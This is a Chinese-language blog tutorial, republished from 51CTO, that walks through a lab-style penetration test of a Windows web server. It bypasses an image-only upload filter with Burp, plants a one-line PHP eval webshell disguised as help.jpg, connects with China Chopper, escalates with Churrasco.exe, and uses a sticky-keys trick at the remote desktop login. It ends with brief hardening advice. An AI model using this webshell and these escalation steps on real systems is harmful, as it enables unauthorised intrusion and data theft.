一次图文并茂的渗透完整测试

简介:
+关注继续查看

任务:某公司授权你对其服务器进行攻击渗透。对某核心服务器进行入侵测试,据了解,该web服务器ip地址(10.1.1.178)存在敏感数据。

      1、利用网站漏洞获取该服务器shell

      2、新建一用户并将权限提升至管理员

      3、获得服务器上的关键敏感数据(C:\console)内。

此文只作为学习

wKiom1U2BPiQHRdAAAYFuisHevk399.jpg

渗透流程

1、探测信息

2、利用漏洞得到管理账号密码

3、找到后台

4、登录后台取得web权限

如果发现直接有上传漏洞就可以利用


1.找到上传漏洞

首先知道ip地址后打开网页访问找到站内上传点

wKiom1U2BajCKGSsAANiioUqIIE272.jpg

wKiom1U2Bh_RkwgEAABdtyzAKpY309.jpgwKioL1U2CC2BkQX-AABelclnTTc694.jpg

上传小马文件报错,只能上传图像文件,只能进行抓包

先进行代理设置

wKiom1U2BxnDIsoNAAKbGxAYTCc892.jpg

2.代理设置


谷歌插件Proxy SwitchySharp进行代理设置,然后开启burpsuite抓包这里就不做介绍了

软件教学可以百度去学习代理端口要一样

wKioL1U2ClfjmK73AAHdUEfTOZY264.jpg


3.抓包分析,并改包上传

开始抓包

wKioL1U2DWrg2XIdAAKKp02zgb8481.jpg

help.jpg内容

1
<span style="font-family:'宋体', SimSun;font-size:16px;color:rgb(0,0,0);"><strong><?php <br data-filtered="filtered">eval($_POST['hao']); <br data-filtered="filtered">?><br data-filtered="filtered"></strong></span>

wKiom1U2DlaiNx72AAHCmiF1gr4543.jpg

修改重新上传,上传成功。

wKiom1U2DyiD9j8AAAExzL-QmvE029.jpg


4.获取webshell权限

上述的http就是小马地址,打开中国菜刀输入

wKioL1U2EU2BMYt0AAECJ7v7kgE398.jpg

获取webshell

wKiom1U2EB7R_yqfAAEwTNAGwJM566.jpg

5.提升管理权限

新建一用户并将权限提升至管理员

用cmd命令获取管理员权限

wKiom1U2ENbhjrhkAAC88AGiToQ304.jpg

添加一个用户hao然后让他加入管理员组可是失败了,没办法只能在此使用工具提权

wKioL1U2EwfCN4bdAAJRffdxXNA800.jpg

wKiom1U2EavjoKuqAAJVt5xGl88071.jpg

wKioL1U2EweAIZaYAAArE4qSqlQ052.jpg

上传脚本,然后重命名,并把php脚本复制到刚才脚本里重新命名后缀php

wKioL1U2FWmTVFQtAAEqJxm0-B8431.jpg

在网站提权中我们经常会使用到这些工具Churrasco.exe (巴西烤肉) 

如果说webshell不能执行cmd那么我们就需要上传一个cmd

如果说上传cmd后不能添加用户那么我我们就需要上传软件提权

wKiom1U2FbHC238HAAQMYWX1egY815.jpg

设置终端路径

wKioL1U2F7Xh0tu_AACD0UkCMRg003.jpg

提权不成功没有administrators组

wKiom1U2HN3RGMGMAADFkQmVZEY840.jpg

进入远程桌面登陆界面  按shift5次得到cmd whoami /all

wKiom1U2HDuzWL63AAGtPzpAouU489.jpg

我们找到useras这个组加入进去就ok了

wKiom1U2HtyCwPUsAAEUuznC8SY331.jpg

wKiom1U2Ht3yXEJ5AACuYE15Jms503.jpg

一次图文并茂的渗透结束了。拷贝敏感数据就可以了,让大家觉得渗透不在神秘,其实更高层次的技术也在研究中,下次带来sqlmap 注入实践教程。

6.安全建议:从上述渗透测试中发现该服务器

1.及时修补系统中的安全漏洞

2.细化服务器文件目录权限,杜绝权限漏洞

3.对于上传权限,可以通过修改服务器的配置来实现对这个漏洞的预防。很多网站都允许用户上传一定数量的图片、Flash 等,很多时候网站开发人员为了日后管理方便,对上传的文件都统一放到指定的一个文件夹里面,管理员只要对该文件夹的执行权限设置成“无”,这样一定程度可以对漏洞进行预防。



本文转自 cs312779641 51CTO博客,原文链接:http://blog.51cto.com/chenhao6/1636637

相关文章
|
11天前
|
Linux 测试技术 数据安全/隐私保护
Linux MeterSphere一站式开源持续测试平台远程访问
在Linux 中部署MeterSphere 并且结合cpolar 内网穿透实现远程也可以访问MeterSphere 界面!
232 0
Linux MeterSphere一站式开源持续测试平台远程访问
|
16天前
|
Linux 测试技术 数据安全/隐私保护
Linux MeterSphere一站式开源持续测试平台远程访问
Linux MeterSphere一站式开源持续测试平台远程访问
32 1
Linux MeterSphere一站式开源持续测试平台远程访问
|
1月前
|
前端开发 算法 JavaScript
【简历优化平台开发教程-12】测试用模版简历!
【简历优化平台开发教程-12】测试用模版简历!
|
1月前
|
小程序 芯片
飞腾平台芯片测试固件(SFW)和开机启动log
飞腾平台芯片测试固件(SFW)和开机启动log
165 0
|
3月前
|
Linux Android开发
支付宝二维码脱机认证库测试(linux_x86平台验证)
支付宝二维码脱机认证库测试(linux_x86平台验证)
|
3月前
|
JavaScript Linux Python
【Matter】如何在Linux平台下测试Matter应用级通信(虚拟设备)
我们使用chip tool结合生成的QR码进行调试,重新打开一个终端,使用默认的chip tool工具(记住不是之前构建应用程序生成的chip tool),通过QR码可以快捷迅速地将虚拟设备添加到网络中,我们使用chip tool对设备进行调试
242 0
|
4月前
|
测试技术
Sonic 开源移动端云真机测试平台 - 用例编写与回放流程实例演示,任务定时执行、图像相似度定位、公共步骤、公共参数、测试套件等(下)
Sonic 开源移动端云真机测试平台 - 用例编写与回放流程实例演示,任务定时执行、图像相似度定位、公共步骤、公共参数、测试套件等(下)
91 0
|
7月前
|
数据库
【每日渗透笔记】参数值对应的接口,注入点测试尝试
【每日渗透笔记】参数值对应的接口,注入点测试尝试
42 0
【每日渗透笔记】参数值对应的接口,注入点测试尝试
|
安全 测试技术 网络安全
dSploit—Android网络渗透套件测试小记(含视频)
dSploit是什么? dSploit是Android系统下的网络分析和渗透套件,其目的是面向IT安全专家和爱好者提供最完整、最先进的专业工具包 ,以便在移动设备上进行网络安全评估。
1253 0
热门文章
最新文章
相关产品
云迁移中心
推荐文章
更多